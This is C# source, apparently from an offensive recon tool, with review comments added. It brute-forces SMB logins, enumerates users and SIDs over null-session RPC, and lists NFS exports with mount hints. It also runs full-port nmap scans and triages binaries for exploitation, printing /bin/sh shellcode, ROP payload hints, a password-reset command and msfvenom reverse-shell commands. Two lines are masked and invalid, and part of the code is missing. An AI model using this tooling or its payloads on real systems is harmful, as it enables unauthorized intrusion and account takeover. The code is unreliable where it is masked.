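                    outputResult.RemoveAll(x => x.Equals("Unable to initialize messaging context"));
                    if (outputResult.Count == 0)
                    {
                        // Nothing to classify; the old code indexed [0] here and aborted the whole run.
                        Console.WriteLine(user + ":" + pass + " - No output from smbclient");
                        continue;
                    }
                    string resultItem = outputResult[0];
                    if (resultItem.Contains("NT_STATUS_HOST_UNREACHABLE"))
                    {
                        Console.WriteLine("Error - Unable to contact \\\\" + ip);
                        return;
                    }
                    else if (resultItem.Contains("NT_STATUS_LOGON_FAILURE"))
                    {
                        Console.WriteLine(user + ":" + pass + " - Failed");
                    }
                    else if (resultItem.Contains("NT_STATUS_UNSUCCESSFUL"))
                    {
                        Console.WriteLine("Fatal Error: " + resultItem);
                        return;
                    }
                    else
                    {
                        // Anything that is not an explicit failure is treated as a hit and the run stops here
                        Console.WriteLine(user + ":" + pass + " - Success!");
                        return;
                    }
                }
            }
            // smbclient -L \\\\10.10.10.172 -U "SABatchJobs%SABatchJobs"
        }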
        /// <summary>
        /// Collects what the RPC service on <paramref name="ip"/> reveals to an unauthenticated
        /// (null-session) rpcclient and returns it as "- " / "-- " prefixed lines. Linux only, and
        /// requires /usr/bin/rpcclient.
        /// </summary>
        /// <param name="ip">Host to query; spliced unquoted into each rpcclient command line.</param>
        /// <returns>The formatted findings, or a single explanatory line when nothing could be run.</returns>
        /// <remarks>
        /// NOTE(review): two lines of this listing (the lookupnames filter and the enumdomusers
        /// "user:"/"rid:" check) are corrupted by the hosting site's masking and are kept verbatim;
        /// the code between them that builds sneakySIDBaseList is missing from this view.
        /// NOTE(review): several branches below assign rpcInfo with "=" instead of "+=", which
        /// discards the "Domain Name:" line appended earlier when lsaquery succeeded.
        /// </remarks>
        private static string GetRPCInfo(string ip)
        {
            string rpcInfo    = "";
            // Set whenever any unauthenticated query returned data; drives the closing summary line.
            bool   anonAccess = false;

            if (General.GetOS() == General.OS.Linux)
            {
                if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient"))
                {
                    // Find the Domain Name
                    List <string> domainNameList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaquery\"");
                    // Keep only the "Domain Name:" line; exactly one such line counts as success.
                    domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:"));
                    if (domainNameList.Count == 1)
                    {
                        anonAccess = true;
                        rpcInfo   += "- " + domainNameList[0] + Environment.NewLine;
                    }

                    // Find basic users
                    List <string> enumdomusersList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"enumdomusers\"");
                    if (enumdomusersList.Count == 0)
                    {
                        // No user listing: fall back to srvinfo / SID probes to decide whether anything is exposed.
                        List <string> srvinfoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"srvinfo\"");
                        if (srvinfoList.Count != 0)
                        {
                            anonAccess = true;
                            rpcInfo   += "- srvinfo: " + srvinfoList[0] + Environment.NewLine;
                        }

                        // Find public SIDs with lsaenumsid
                        List <string> sidList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaenumsid\"");
                        if (sidList.Count != 0)
                        {
                            anonAccess = true;
                            rpcInfo   += "- Found SIDs" + Environment.NewLine;
                            // Remove the "found X SIDs" text
                            sidList.RemoveAll(x => x.StartsWith("found "));

                            // Remove blanks
                            sidList.RemoveAll(x => string.IsNullOrEmpty(x));

                            string sidListString = string.Join(' ', sidList);

                            // Enumerate the rest
                            // All SIDs are resolved in one lookupsids call; each result line is appended as-is.
                            List <string> sidResolution = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids {sidListString}\"");
                            if (sidResolution.Count != 0)
                            {
                                foreach (string result in sidResolution)
                                {
                                    rpcInfo += "-- " + result + Environment.NewLine;
                                }
                            }
                        }

                        // Find sneaky SIDs
                        // NOTE(review): the \" that opens the -c argument is never closed in this string — confirm rpcclient accepts it.
                        List <string> sneakyNameLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupnames administrator guest krbtgt root bin none");
                        // NOTE(review): the next line is masked ("******") in this listing and is not valid C# as shown; the
                        // loop that derives sneakySIDBaseList from the lookupnames output is missing between here and the
                        // closing braces below. Kept verbatim.
                        sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1);
                                    if (!sneakySIDBaseList.Contains(sneakySIDBase))
                                    {
                                        sneakySIDBaseList.Add(sneakySIDBase);
                                    }
                                }
                            }

                            if (sneakySIDBaseList.Count != 0)
                            {
                                List <string> sneakySIDList = new List <string>();
                                foreach (string sneakyBase in sneakySIDBaseList)
                                {
                                    // Low ones are just system names - Can ignore them - Proper ones start from 1000
                                    // RIDs 1000..1010 are appended to every base and resolved in one call per base.
                                    sneakySIDList.Add(sneakyBase + "1000");
                                    sneakySIDList.Add(sneakyBase + "1001");
                                    sneakySIDList.Add(sneakyBase + "1002");
                                    sneakySIDList.Add(sneakyBase + "1003");
                                    sneakySIDList.Add(sneakyBase + "1004");
                                    sneakySIDList.Add(sneakyBase + "1005");
                                    sneakySIDList.Add(sneakyBase + "1006");
                                    sneakySIDList.Add(sneakyBase + "1007");
                                    sneakySIDList.Add(sneakyBase + "1008");
                                    sneakySIDList.Add(sneakyBase + "1009");
                                    sneakySIDList.Add(sneakyBase + "1010");
                                    // NOTE(review): sneakySIDList is never cleared, so with several bases each later
                                    // lookup re-resolves the earlier bases' SIDs as well.
                                    List <string> sneakySIDLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids " + string.Join(" ", sneakySIDList) + "\"");
                                    if (sneakySIDLookup.Count != 0)
                                    {
                                        foreach (string lookupResult in sneakySIDLookup)
                                        {
                                            // Cut at the " (1)" marker; IndexOf returns -1 and Substring throws if it is absent.
                                            string name = lookupResult.Substring(0, lookupResult.IndexOf(" (1)"));

                                            // Keep only the part after the last backslash (strip the domain prefix).
                                            name = name.Remove(0, name.LastIndexOf("\\") + 1);

                                            // Invalid ones simply have the number itself instead of the name
                                            // A bit hacky, but it works
                                            if (!int.TryParse(name, out int toIgnore))
                                            {
                                                rpcInfo += "-- Sneaky Name Found: " + name + Environment.NewLine;
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                    else // Count > 0
                    {
                        string firstItem = enumdomusersList[0];
                        // NOTE(review): this condition is masked ("******") in the listing and is not valid C# as shown. Kept verbatim.
                        if (firstItem.Contains("user:"******"rid:"))
                        {
                            // All is fine
                            if (enumdomusersList.Count >= 3)
                            {
                                Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected");
                            }
                            // "=" here overwrites anything collected above (e.g. the Domain Name line).
                            rpcInfo = "- User Listing" + Environment.NewLine;
                            foreach (string user in enumdomusersList)
                            {
                                // One extra rpcclient call per user (queryuser) via the sibling helper.
                                rpcInfo += QueryEnumDomUser(ip, user);
                            }
                            // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                            rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND")
                        {
                            rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT")
                        {
                            rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED")
                        {
                            rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine;
                        }
                        else
                        {
                            // Unrecognised output: dump it raw so the maintainer can add a case for it.
                            foreach (string item in enumdomusersList)
                            {
                                Console.WriteLine("Debug Info item: " + item);
                            }
                            rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine;
                        }
                    }
                    // Closing summary; the highlighted line is only emitted when some query returned data.
                    if (anonAccess == true)
                    {
                        rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine;
                    }
                    else
                    {
                        rpcInfo += "- No anonymous RPC access" + Environment.NewLine;
                        // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                        rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                    }
                }
                else
                {
                    rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine;
                }
            }
            else
            {
                rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine;
            }
            return(rpcInfo);
        }
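        /// <summary>
        /// Lists the NFS exports advertised by <paramref name="target"/> by running the local
        /// <c>showmount -e</c> binary and formats them as "- " prefixed lines.
        /// </summary>
        /// <param name="target">Host name or IP address to query; spliced unquoted into the showmount command line.</param>
        /// <param name="port">Unused; kept so the signature matches the other per-service GetInfo methods.</param>
        /// <returns>
        /// The formatted export list with trailing newlines trimmed, a "- ..." explanation when
        /// showmount is unavailable or the OS is unsupported, or an empty string when showmount
        /// produced nothing to report.
        /// </returns>
        public static string GetInfo(string target, int port)
        {
            // TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse
            if (General.GetOS() == General.OS.Windows)
            {
                return GetNFSInfo_Windows(target);
            }
            if (General.GetOS() == General.OS.Linux)
            {
                return GetNFSInfo_Linux(target);
            }
            Console.WriteLine("Error - OS Not Supportd - Bug Reelix");
            return "";
        }

        // Windows path: uses the bundled showmount.exe; the first output line is dropped (presumably a header — confirm).
        private static string GetNFSInfo_Windows(string target)
        {
            const string showmountPath = @"C:\Windows\System32\showmount.exe";
            if (!File.Exists(showmountPath))
            {
                return "- showmount does not exist - Bug Reelix to update this section for more compatibility";
            }

            List<string> outputLines = General.GetProcessOutput(showmountPath, "-e " + target);
            if (outputLines.Count <= 1)
            {
                // Header only (or nothing): no exports to report.
                return "";
            }
            outputLines.RemoveAt(0);

            string fileList = "- Files:" + Environment.NewLine;
            foreach (string line in outputLines)
            {
                fileList += "-- " + line + Environment.NewLine;
            }
            fileList  = fileList.Trim(Environment.NewLine.ToCharArray());
            fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:";
            return fileList.Trim(Environment.NewLine.ToCharArray());
        }

        // Linux path: requires /sbin/showmount. Exports open to "(everyone)" are highlighted.
        private static string GetNFSInfo_Linux(string target)
        {
            if (!General.IsInstalledOnLinux("showmount", "/sbin/showmount"))
            {
                // Previously this case fell through and returned "" with no explanation.
                return "- Error: Cannot find /sbin/showmount - Skipping NFS export check";
            }

            List<string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target);
            string fileList = "";
            foreach (string line in showmountOutput)
            {
                if (line.Contains(" (everyone)"))
                {
                    fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                    fileList += "-- " + $"mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine;
                }
                else
                {
                    fileList += "- " + line + Environment.NewLine;
                }
            }
            return fileList.Trim(Environment.NewLine.ToCharArray());
        }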
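        /// <summary>
        /// Runs the initial full-port nmap scan that the rest of reecon parses, writing greppable
        /// output to <c>{fileName}.nmap</c> in the working directory.
        /// </summary>
        /// <param name="args">
        /// <c>args[0]</c> is the target host; <c>args[1]</c> is the optional output file name
        /// (no extension). With only the target given, the file name is read from the console.
        /// </param>
        /// <param name="mustPing">When false, <c>-Pn</c> is added so the scan proceeds without a host-discovery probe.</param>
        /// <returns>The output file name without the <c>.nmap</c> extension.</returns>
        /// <remarks>
        /// Usage and environment errors terminate the process via <see cref="Environment.Exit(int)"/>.
        /// NOTE(review): the exit code is 0 in every error path, as in the original, so a calling
        /// script cannot distinguish failure from success by exit status.
        /// </remarks>
        public static string DefaultScan(string[] args, bool mustPing)
        {
            // ip[0]
            // outputfile[1]
            if (args.Length < 1 || args.Length > 2)
            {
                // Previously only "< 1" was rejected; extra arguments silently left target empty.
                Console.WriteLine("Usage: ip outfile");
                Environment.Exit(0);
            }

            string target = args[0];
            string fileName;
            if (args.Length == 1)
            {
                Console.WriteLine("Outfile name (1 word, no extension)");
                // ReadLine returns null on EOF; treat that like an empty answer.
                fileName = Console.ReadLine() ?? "";
            }
            else
            {
                fileName = args[1];
            }

            // The name is spliced into the nmap argument list, so it must be one non-empty token;
            // whitespace would otherwise be parsed as extra nmap arguments.
            if (string.IsNullOrWhiteSpace(fileName) || fileName.Any(c => char.IsWhiteSpace(c)))
            {
                Console.WriteLine("Error - Outfile name must be a single word");
                Environment.Exit(0);
            }

            // Check if nmap is installed
            var os = General.GetOS();
            if (os == General.OS.Windows)
            {
                List<string> nmapOutput = General.GetProcessOutput("nmap", "-V");
                if (nmapOutput.Count == 0 || !nmapOutput[0].Contains("https://nmap.org"))
                {
                    Console.WriteLine("Error - nmap is not installed");
                    Environment.Exit(0);
                }
            }
            else if (os == General.OS.Linux)
            {
                if (!General.IsInstalledOnLinux("nmap"))
                {
                    Console.WriteLine("Error - nmap is not installed");
                    Environment.Exit(0);
                }
            }
            else
            {
                Console.WriteLine("Error - There is no nmap detection on this OS :<");
                Environment.Exit(0);
            }

            Console.WriteLine($"Doing an optimized Nmap scan on {target} - This may take awhile...");
            string noPing   = mustPing ? "" : " -Pn ";
            string nmapArgs = $"-sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap";

            // UtcNow so the measured duration is unaffected by local clock/DST changes mid-scan.
            DateTime beforeNmapDate = DateTime.UtcNow;
            if (os == General.OS.Linux)
            {
                // Presumably sudo is needed because -sS requires raw-socket privileges — confirm.
                General.RunProcess("sudo", "nmap " + nmapArgs);
            }
            else
            {
                General.RunProcess("nmap", nmapArgs);
            }
            TimeSpan nmapScanDuration = DateTime.UtcNow - beforeNmapDate;

            Console.WriteLine("Scan complete in " + string.Format("{0:0.00}s", nmapScanDuration.TotalSeconds) + $" - {fileName}.nmap for reecon");
            return fileName;
        }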
        /// <summary>
        /// Prints a quick triage of a local binary: a cyclic-pattern crash offset (x86 only), ropper
        /// gadget/string hits, the rabin2 NX flag and objdump call/symbol lines. Every external tool
        /// is optional; a missing one is reported and that section is skipped.
        /// </summary>
        /// <param name="fileName">Path to the file; must start with "./" or the method returns immediately.</param>
        /// <remarks>
        /// NOTE(review): the rabin2 section calls .Contains on FirstOrDefault(...) without a null
        /// check and throws NullReferenceException when no "nx"/"bits" line is present; the pwn
        /// section's .First() throws InvalidOperationException when "pwn cyclic -l" prints nothing.
        /// </remarks>
        private static void ScanFile(string fileName)
        {
            if (!fileName.StartsWith("./"))
            {
                Console.WriteLine("fileName must start with ./");
                return;
            }

            // Classified by the sibling IDFile helper (defined elsewhere in this file).
            Architecture architecture = IDFile(fileName);

            if (architecture == Architecture.Linux86)
            {
                Console.WriteLine("Architecture: x86");
                // You can get a segfault address of x86 programs by going
                // dmesg | tail -2 (Sometimes the last entry isn't for it)
                // dmesg | grep "ret2win32" | tail -1

                // pwn cyclic 500
                // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
                if (General.IsInstalledOnLinux("pwn"))
                {
                    // Feeds the hard-coded 500-byte cyclic pattern to the binary via bash; the trailing 5 is
                    // presumably a timeout in seconds — confirm against General.RunProcess.
                    General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
                    // The crash address is then recovered from the kernel log rather than from the process itself.
                    List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
                    foreach (string item in dmesgOutput)
                    {
                        //  segfault at 6161616c ip 000000006161616c x
                        // TrimStart strips leading '.' and '/' characters so the bare file name is matched.
                        if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
                        {
                            // Console.WriteLine("-- Item: " + item);
                            // 12 == "segfault at ".Length; up to 9 characters are taken and trimmed.
                            string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim();
                            // Console.WriteLine("-- segfaultHex: " + segfaultHex);
                            // HEX2ASCII is a sibling helper; the characters are reversed before the lookup
                            // (presumably to undo little-endian byte order — confirm).
                            string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray()));
                            // Console.WriteLine("-- pwntoolsSearch: " + segfaultHex);
                            // .First() throws InvalidOperationException if pwn prints nothing.
                            string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First();
                            Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
                }
            }
            else if (architecture == Architecture.Linux64)
            {
                Console.WriteLine("Architecture: x64");
                // TODO: Find where it segfaults, -1
            }
            else if (architecture == Architecture.Windows)
            {
                Console.WriteLine("File Type: Windows (Unknown Architecture)");
            }
            else
            {
                Console.WriteLine("Architecture: Unknown - Bug Reelix to fix this!");
            }

            if (General.IsInstalledOnLinux("ropper"))
            {
                // Four ropper passes follow; "[INFO]"/"[LOAD]" lines are ropper's own progress output and are ignored.
                List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace(": ret;", "");
                        // 18 == "0x" + 16 hex digits; 10 == "0x" + 8 hex digits.
                        if (pwnItem.Length == 18) // x64
                        {
                            // Only the low 6 hex digits of the address are kept in the hint.
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                            Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                        }
                        else if (pwnItem.Length == 10) // x86
                        {
                            Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                        }
                        else
                        {
                            Console.WriteLine("Error - Unknown ret length: " + pwnItem.Length);
                        }
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        if (item.Contains(": pop rdi; ret;"))
                        {
                            string pwnItem = item.Trim();
                            pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
                            if (pwnItem.Length == 18)
                            {
                                // TODO: p64 is only for x64 processes - Check first and implement x86 variant
                                pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                                // 0x16 - x64 address
                                Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
                            }
                            else
                            {
                                Console.WriteLine("Not 18 - " + pwnItem.Length);
                            }
                        }
                        else
                        {
                            Console.WriteLine("Unknown prr item: " + item);
                        }
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
                    {
                        string pwnItem = item.Trim();
                        // The doubled ";;" is a harmless empty statement.
                        pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
                        // NOTE(review): this branch expects a 10-character (x86-sized) address but still emits a p64 hint.
                        if (pwnItem.Length == 10)
                        {
                            // TODO: p64 is only for x64 processes - Check first and implement x86 variant
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 10 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- /bin/sh --> " + pwnItem);
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"jmp esp;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        if (item.Contains(": jmp esp;"))
                        {
                            string pwnItem = item.Trim();
                            pwnItem = pwnItem.Replace(": jmp esp;", "").Trim();
                            if (pwnItem.Length == 10 && pwnItem.Substring(0, 2) == "0x")
                            {
                                // 0x080414c3 -> 080414c3
                                string jmpesp = pwnItem.Remove(0, 2);
                                // 080414c3 -> "\xc3\x14\x04\x08"
                                // Byte pairs are emitted in reverse order (little-endian) as \x escapes.
                                jmpesp = string.Format("\\x{0}\\x{1}\\x{2}\\x{3}", jmpesp.Substring(6, 2), jmpesp.Substring(4, 2), jmpesp.Substring(2, 2), jmpesp.Substring(0, 2));
                                Console.WriteLine("- jmp esp; --> " + pwnItem + " --> " + jmpesp);
                            }
                            else
                            {
                                Console.WriteLine("Invalud length - Bug Reelix!");
                            }
                        }
                        else
                        {
                            Console.WriteLine("Unknown jmp esp Item: " + item);
                        }
                    }
                }
                // // ropper --file sudo_pwn_file_here --string "/bin/sh"
            }
            else
            {
                Console.WriteLine("- ropper is not installed (pip install ropper) - Skipping gadget check and string search");
            }

            if (General.IsInstalledOnLinux("rabin2"))
            {
                // NOTE(review): fileName already starts with "./" (checked above), so this passes "././name".
                List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
                // NOTE(review): FirstOrDefault may return null (no "nx" line) — .Contains then throws NullReferenceException.
                if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("false"))
                {
                    // NX disabled: prints the hard-coded payload string matching the detected architecture.
                    Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                    if (architecture == Architecture.Linux64) // bits ?
                    {
                        Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                    }
                    else if (architecture == Architecture.Linux86)
                    {
                        Console.WriteLine(@"Linux/x86 - Execute /bin/sh: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80");
                    }
                    else if (architecture == Architecture.Windows)
                    {
                        // -f c = Format (Else it just parses raw bytes instead of showing them)
                        // -b = Bad characters
                        // Same null-dereference risk as above if rabin2 prints no "bits" line.
                        if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("32"))
                        {
                            Console.WriteLine("-- Windows - x86 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x86 --platform windows -f c -b \"\\x00\"");
                        }
                        else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("64"))
                        {
                            Console.WriteLine("-- Windows - x64 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x64 --platform windows -f c -b \"\\x00\"");
                        }
                        else
                        {
                            // http://shell-storm.org/shellcode/
                            Console.WriteLine("Unknown Inner Arch - Bug Reelix to fix his code!");
                        }
                    }
                    else
                    {
                        // http://shell-storm.org/shellcode/
                        Console.WriteLine("Unknown Outer Arch - Bug Reelix to fix his code!");
                    }
                }
                else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("true"))
                {
                    Console.WriteLine("- nx enabled - No custom shellcode for you!");
                }
            }
            else
            {
                Console.WriteLine("- rabin2 is not installed (sudo apt install radare2 or https://github.com/radareorg/radare2/releases) - Skipping nx check");
            }

            if (General.IsInstalledOnLinux("objdump"))
            {
                bool          hasMain       = false;
                // Full disassembly (-D); each line is scanned for a few markers of interest.
                List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
                foreach (string item in objdumpOutput)
                {
                    if (item.Contains("call") && item.Contains("system")) // callq contains call
                    {
                        Console.WriteLine("- system --> " + item);
                    }
                    if (item.Trim().EndsWith(" <puts@plt>:"))
                    {
                        Console.WriteLine("- puts@plt (plt_puts) --> " + item);
                    }
                    if (item.Contains("puts@GLIBC"))
                    {
                        Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
                    }
                    if (item.Trim().EndsWith(" <main>:"))
                    {
                        hasMain = true;
                        // Takes the text before the first space; Substring throws if the line has none.
                        Console.WriteLine("- <main> Address: " + item.Substring(0, item.IndexOf(" ")));
                    }
                }

                // Stripped binaries have no <main> label; fall back to the header's start address (-f).
                if (!hasMain)
                {
                    objdumpOutput = General.GetProcessOutput("objdump", $"-f {fileName}");
                    foreach (string item in objdumpOutput)
                    {
                        if (item.Trim().StartsWith("start address "))
                        {
                            Console.WriteLine("- " + item);
                            break;
                        }
                    }
                }

                // Symbol table (-t): only global symbols in .text are reported.
                objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
                foreach (string item in objdumpOutput)
                {
                    // .text = Name
                    // " g" = Global
                    if (item.Contains(".text") && item.Contains(" g "))
                    {
                        Console.WriteLine("- Useful Symbol: " + item);
                    }
                }
                // objdump -t ./file.elf | grep .text
            }
            else
            {
                Console.WriteLine("- objdump is not installed - Skipping syscalls");
            }
            Console.WriteLine("Finished");
        }